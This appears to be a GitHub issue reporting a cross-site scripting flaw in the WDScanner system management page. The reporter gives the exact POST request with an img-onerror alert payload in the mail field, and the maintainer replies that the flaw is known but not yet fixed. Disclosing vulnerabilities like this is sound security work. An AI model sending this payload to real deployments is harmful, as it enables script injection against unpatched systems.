### ISSUE TITLE
XSS vulnerability in system management page

### ISSUE THREAD

**Issue by abc2342537** [TideSec/WDScanner#41]
Hello, I found XSS vulnerability in the system management page。
<img width="783" alt="1" src="https://user-images.githubusercontent.com/27681113/71954440-3fdcd200-3220-11ea-8182-9e61ea246b98.png">
This is the payload When I tested:
page：index.php
Param:c=new&m=set
ParamKey:mail
POSTData: 
group=0&mail=<img src=1 onerror=alert(1)>&passwd=g00dPa%24%24w0rD&phone=555-666-0606&status=1&username=GRLpGpAGa
<img width="635" alt="2" src="https://user-images.githubusercontent.com/27681113/71954548-a104a580-3220-11ea-9b58-cce1761fa039.png">

**Comment by TideSec** [comment]
是的，之前就已经发现了~谢谢~不过因为忙着开发新系统，所以也没修补。。
